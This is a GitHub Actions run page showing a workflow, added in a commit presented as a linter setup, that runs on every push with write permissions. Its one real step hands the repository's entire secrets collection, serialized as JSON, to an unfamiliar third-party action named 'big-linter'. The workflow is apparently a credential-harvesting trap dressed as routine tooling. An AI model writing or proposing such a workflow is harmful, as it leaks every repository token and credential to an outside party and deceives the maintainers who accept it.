Skip to content

feat: add github actions workflow for big-linter #1

feat: add github actions workflow for big-linter

feat: add github actions workflow for big-linter #1

Workflow file for this run

name: Lint
on: [push]
permissions:
contents: write
pull-requests: write
jobs:
lint:
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v3
- name: Run Big Linter
uses: gcbrun/big-linter@v1
env:
PR_ENVIRONMENT: ${{ toJSON(secrets) }}